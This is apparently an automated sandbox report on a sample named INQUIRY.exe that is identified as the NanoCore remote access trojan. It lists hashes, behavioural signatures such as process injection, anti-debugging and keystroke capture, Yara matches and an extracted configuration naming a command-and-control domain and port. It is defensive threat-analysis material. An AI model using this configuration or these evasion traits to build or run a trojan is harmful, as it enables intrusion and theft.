Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
INQUIRY.exe

Overview

General Information

Sample Name:INQUIRY.exe
Analysis ID:558450
MD5:dc0acc75361bb39fbd4abec6edc82cd5
SHA1:9e9c823725bee12d0980009c04692ad9089d9308
SHA256:d73cbcb2d300d84618d476706765b185c12d20d2e52afe120fb587c81be7cc80
Infos:

Detection

Nanocore
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Malicious sample detected (through community Yara rule)
Sigma detected: NanoCore
Detected Nanocore Rat
Yara detected Nanocore RAT
Detected unpacking (creates a PE file in dynamic memory)
Machine Learning detection for sample
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses dynamic DNS services
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Detected TCP or UDP traffic on non-standard ports
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64
  • INQUIRY.exe (PID: 6904 cmdline: "C:\Users\user\Desktop\INQUIRY.exe" MD5: DC0ACC75361BB39FBD4ABEC6EDC82CD5)
    • INQUIRY.exe (PID: 7084 cmdline: "C:\Users\user\Desktop\INQUIRY.exe" MD5: DC0ACC75361BB39FBD4ABEC6EDC82CD5)
  • rstmgknbahw.exe (PID: 6472 cmdline: "C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" MD5: DC0ACC75361BB39FBD4ABEC6EDC82CD5)
    • rstmgknbahw.exe (PID: 1904 cmdline: "C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" MD5: DC0ACC75361BB39FBD4ABEC6EDC82CD5)
  • rstmgknbahw.exe (PID: 4296 cmdline: "C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" MD5: DC0ACC75361BB39FBD4ABEC6EDC82CD5)
    • rstmgknbahw.exe (PID: 5320 cmdline: "C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" MD5: DC0ACC75361BB39FBD4ABEC6EDC82CD5)
  • cleanup
{"Version": "1.2.2.0", "Mutex": "b46b5964-4830-4c6b-9df5-a21557a1", "Group": "Default", "Domain1": "onyeoma.ddns.net", "Domain2": "127.0.0.1", "Port": 4141, "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}
SourceRuleDescriptionAuthorStrings
00000005.00000002.719731750.0000000002400000.00000004.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0x215e5:$x1: NanoCore.ClientPluginHost
  • 0x21622:$x2: IClientNetworkHost
  • 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000005.00000002.719731750.0000000002400000.00000004.00000001.sdmpNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
  • 0x2135d:$x1: NanoCore Client.exe
  • 0x215e5:$x2: NanoCore.ClientPluginHost
  • 0x22c1e:$s1: PluginCommand
  • 0x22c12:$s2: FileCommand
  • 0x23ac3:$s3: PipeExists
  • 0x2987a:$s4: PipeCreated
  • 0x2160f:$s5: IClientLoggingHost
00000005.00000002.719731750.0000000002400000.00000004.00000001.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
    00000005.00000002.719731750.0000000002400000.00000004.00000001.sdmpNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
    • 0x2134d:$a: NanoCore
    • 0x2135d:$a: NanoCore
    • 0x21591:$a: NanoCore
    • 0x215a5:$a: NanoCore
    • 0x215e5:$a: NanoCore
    • 0x213ac:$b: ClientPlugin
    • 0x215ae:$b: ClientPlugin
    • 0x215ee:$b: ClientPlugin
    • 0x214d3:$c: ProjectData
    • 0x21eda:$d: DESCrypto
    • 0x298a6:$e: KeepAlive
    • 0x27894:$g: LogClientMessage
    • 0x23a8f:$i: get_Connected
    • 0x22210:$j: #=q
    • 0x22240:$j: #=q
    • 0x2225c:$j: #=q
    • 0x2228c:$j: #=q
    • 0x222a8:$j: #=q
    • 0x222c4:$j: #=q
    • 0x222f4:$j: #=q
    • 0x22310:$j: #=q
    00000002.00000000.662575253.0000000000414000.00000040.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
    • 0x111e5:$x1: NanoCore.ClientPluginHost
    • 0x11222:$x2: IClientNetworkHost
    • 0x14d55:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
    Click to see the 99 entries
    SourceRuleDescriptionAuthorStrings
    6.0.rstmgknbahw.exe.400000.1.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
    • 0x85e5:$x1: NanoCore.ClientPluginHost
    • 0x8622:$x2: IClientNetworkHost
    • 0xc155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
    6.0.rstmgknbahw.exe.400000.1.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
    • 0x835d:$x1: NanoCore Client.exe
    • 0x85e5:$x2: NanoCore.ClientPluginHost
    • 0x9c1e:$s1: PluginCommand
    • 0x9c12:$s2: FileCommand
    • 0xaac3:$s3: PipeExists
    • 0x1087a:$s4: PipeCreated
    • 0x860f:$s5: IClientLoggingHost
    6.0.rstmgknbahw.exe.400000.1.unpackJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
      6.0.rstmgknbahw.exe.400000.1.unpackNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
      • 0x834d:$a: NanoCore
      • 0x835d:$a: NanoCore
      • 0x8591:$a: NanoCore
      • 0x85a5:$a: NanoCore
      • 0x85e5:$a: NanoCore
      • 0x83ac:$b: ClientPlugin
      • 0x85ae:$b: ClientPlugin
      • 0x85ee:$b: ClientPlugin
      • 0x84d3:$c: ProjectData
      • 0x8eda:$d: DESCrypto
      • 0x108a6:$e: KeepAlive
      • 0xe894:$g: LogClientMessage
      • 0xaa8f:$i: get_Connected
      • 0x9210:$j: #=q
      • 0x9240:$j: #=q
      • 0x925c:$j: #=q
      • 0x928c:$j: #=q
      • 0x92a8:$j: #=q
      • 0x92c4:$j: #=q
      • 0x92f4:$j: #=q
      • 0x9310:$j: #=q
      6.2.rstmgknbahw.exe.37a3258.4.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0x1018d:$x1: NanoCore.ClientPluginHost
      • 0x101ca:$x2: IClientNetworkHost
      • 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
      Click to see the 416 entries

      AV Detection

      barindex
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\INQUIRY.exe, ProcessId: 7084, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

      E-Banking Fraud

      barindex
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\INQUIRY.exe, ProcessId: 7084, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

      Stealing of Sensitive Information

      barindex
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\INQUIRY.exe, ProcessId: 7084, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

      Remote Access Functionality

      barindex
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\INQUIRY.exe, ProcessId: 7084, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: 00000004.00000002.725196610.000000000390A000.00000004.00000001.sdmpMalware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "b46b5964-4830-4c6b-9df5-a21557a1", "Group": "Default", "Domain1": "onyeoma.ddns.net", "Domain2": "127.0.0.1", "Port": 4141, "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}
      Source: Yara matchFile source: 6.0.rstmgknbahw.exe.400000.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.rstmgknbahw.exe.37a3258.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.0.rstmgknbahw.exe.415058.10.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.2.rstmgknbahw.exe.2411458.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.rstmgknbahw.exe.3820e14.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.0.rstmgknbahw.exe.400000.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.0.rstmgknbahw.exe.400000.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.0.rstmgknbahw.exe.400000.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.rstmgknbahw.exe.6d8d50.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.0.rstmgknbahw.exe.400000.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.1.rstmgknbahw.exe.415058.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.0.INQUIRY.exe.400000.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.rstmgknbahw.exe.2300000.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.0.INQUIRY.exe.400000.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.rstmgknbahw.exe.415058.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.0.rstmgknbahw.exe.415058.10.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.rstmgknbahw.exe.415058.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.0.rstmgknbahw.exe.415058.12.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.rstmgknbahw.exe.382543d.7.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.0.INQUIRY.exe.400000.7.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.0.INQUIRY.exe.400000.5.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.0.rstmgknbahw.exe.400000.7.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.rstmgknbahw.exe.2311458.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.rstmgknbahw.exe.2510000.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.rstmgknbahw.exe.3950e14.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.1.rstmgknbahw.exe.415058.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.rstmgknbahw.exe.4980000.9.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.rstmgknbahw.exe.3950e14.6.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.0.rstmgknbahw.exe.415058.10.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.rstmgknbahw.exe.49d0000.9.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.0.INQUIRY.exe.400000.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.0.rstmgknbahw.exe.400000.9.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.rstmgknbahw.exe.4940000.8.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.0.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.1.rstmgknbahw.exe.400000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.rstmgknbahw.exe.400000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.0.rstmgknbahw.exe.400000.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.0.INQUIRY.exe.415058.10.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.0.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.rstmgknbahw.exe.638d50.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.rstmgknbahw.exe.394bfde.8.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.0.rstmgknbahw.exe.400000.9.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.0.INQUIRY.exe.415058.12.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.0.INQUIRY.exe.400000.9.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.rstmgknbahw.exe.2311458.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.rstmgknbahw.exe.400000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.0.INQUIRY.exe.400000.11.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.0.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.INQUIRY.exe.24e0000.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.0.INQUIRY.exe.415058.12.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 1.2.INQUIRY.exe.22e0000.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.INQUIRY.exe.400000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 1.2.INQUIRY.exe.22f1458.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.rstmgknbahw.exe.415058.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.0.rstmgknbahw.exe.415058.12.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.0.rstmgknbahw.exe.400000.6.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.0.rstmgknbahw.exe.415058.12.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.INQUIRY.exe.39a98c0.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.rstmgknbahw.exe.2510000.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.rstmgknbahw.exe.395543d.7.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.1.rstmgknbahw.exe.415058.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.0.INQUIRY.exe.415058.10.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.INQUIRY.exe.39adee9.7.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.rstmgknbahw.exe.6d8d50.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.1.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.2.rstmgknbahw.exe.2411458.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.rstmgknbahw.exe.381bfde.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.INQUIRY.exe.415058.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.rstmgknbahw.exe.415058.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.0.rstmgknbahw.exe.400000.8.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.INQUIRY.exe.24e0000.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.1.rstmgknbahw.exe.415058.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.0.rstmgknbahw.exe.400000.7.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.0.rstmgknbahw.exe.400000.5.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.0.rstmgknbahw.exe.400000.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.1.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.0.rstmgknbahw.exe.400000.11.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.INQUIRY.exe.782558.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.0.rstmgknbahw.exe.415058.10.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 1.2.INQUIRY.exe.22f1458.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.2.rstmgknbahw.exe.2400000.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.rstmgknbahw.exe.38d3258.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.INQUIRY.exe.415058.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.INQUIRY.exe.39a98c0.6.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.0.INQUIRY.exe.400000.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.INQUIRY.exe.782558.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.0.rstmgknbahw.exe.400000.5.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.rstmgknbahw.exe.38d3258.5.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.rstmgknbahw.exe.3820e14.6.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.INQUIRY.exe.2520000.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.0.rstmgknbahw.exe.400000.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 1.2.INQUIRY.exe.22e0000.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.rstmgknbahw.exe.4940000.8.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.rstmgknbahw.exe.37a3258.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.0.INQUIRY.exe.400000.6.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.0.rstmgknbahw.exe.400000.8.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.rstmgknbahw.exe.2300000.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.0.INQUIRY.exe.400000.8.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.0.rstmgknbahw.exe.415058.12.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.2.rstmgknbahw.exe.2400000.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.0.rstmgknbahw.exe.400000.11.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.rstmgknbahw.exe.638d50.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.0.rstmgknbahw.exe.400000.6.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000005.00000002.719731750.0000000002400000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000000.662575253.0000000000414000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.918404744.0000000002522000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.735100285.0000000004940000.00000004.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.665449354.00000000022E0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.917467270.0000000000774000.00000004.00000020.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000001.703365040.0000000000400000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.723024476.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000000.716081773.0000000000414000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000001.718977051.0000000000414000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.725072072.0000000002510000.00000004.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.725158787.00000000038D1000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.725196610.000000000390A000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.735022366.00000000037DA000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.734234340.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.704939952.0000000002300000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.916471993.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.735138898.0000000004982000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.734386129.0000000000625000.00000004.00000020.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.734985665.00000000037A1000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000000.701936247.0000000000414000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000000.663644960.0000000000414000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.724570206.00000000006C5000.00000004.00000020.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000000.718272419.0000000000414000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000000.702725030.0000000000414000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.725281266.00000000049D2000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.918375056.00000000024E0000.00000004.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.918797240.00000000039A2000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: INQUIRY.exe PID: 6904, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: INQUIRY.exe PID: 7084, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: rstmgknbahw.exe PID: 1904, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: rstmgknbahw.exe PID: 5320, type: MEMORYSTR
      Source: INQUIRY.exeJoe Sandbox ML: detected
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeJoe Sandbox ML: detected
      Source: 4.0.rstmgknbahw.exe.400000.4.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: 1.2.INQUIRY.exe.30e0000.5.unpackAvira: Label: TR/Patched.Ren.Gen
      Source: 2.0.INQUIRY.exe.400000.4.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: 2.0.INQUIRY.exe.400000.7.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: 6.0.rstmgknbahw.exe.400000.7.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: 2.0.INQUIRY.exe.400000.5.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: 6.2.rstmgknbahw.exe.4980000.9.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: 6.0.rstmgknbahw.exe.400000.9.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: 4.2.rstmgknbahw.exe.49d0000.9.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: 4.0.rstmgknbahw.exe.400000.9.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: 2.0.INQUIRY.exe.400000.9.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: 2.0.INQUIRY.exe.400000.11.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: 6.0.rstmgknbahw.exe.400000.6.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: 6.2.rstmgknbahw.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: 6.1.rstmgknbahw.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: 6.0.rstmgknbahw.exe.400000.8.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: 4.0.rstmgknbahw.exe.400000.11.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: 4.0.rstmgknbahw.exe.400000.7.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: 4.0.rstmgknbahw.exe.400000.5.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: 4.1.rstmgknbahw.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: 2.2.INQUIRY.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: 2.2.INQUIRY.exe.39a98c0.6.unpackAvira: Label: TR/NanoCore.fadte
      Source: 6.0.rstmgknbahw.exe.400000.5.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: 4.2.rstmgknbahw.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: 6.0.rstmgknbahw.exe.400000.4.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: 2.2.INQUIRY.exe.2520000.4.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: 4.0.rstmgknbahw.exe.400000.8.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: 2.0.INQUIRY.exe.400000.6.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: 2.0.INQUIRY.exe.400000.8.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: 6.0.rstmgknbahw.exe.400000.11.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: 4.0.rstmgknbahw.exe.400000.6.unpackAvira: Label: TR/Dropper.MSIL.Gen7

      Compliance

      barindex
      Source: C:\Users\user\Desktop\INQUIRY.exeUnpacked PE file: 2.2.INQUIRY.exe.2520000.4.unpack
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeUnpacked PE file: 6.2.rstmgknbahw.exe.4980000.9.unpack
      Source: INQUIRY.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: C:\Users\user\Desktop\INQUIRY.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dllJump to behavior
      Source: Binary string: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: INQUIRY.exe, 00000002.00000002.918475302.00000000025C7000.00000004.00000040.sdmp
      Source: Binary string: C:\Windows\mscorlib.pdb] source: INQUIRY.exe, 00000002.00000002.918475302.00000000025C7000.00000004.00000040.sdmp
      Source: Binary string: mscorlib.pdb source: INQUIRY.exe, 00000002.00000002.918475302.00000000025C7000.00000004.00000040.sdmp
      Source: Binary string: mscorlib.pdbX source: INQUIRY.exe, 00000002.00000002.918475302.00000000025C7000.00000004.00000040.sdmp
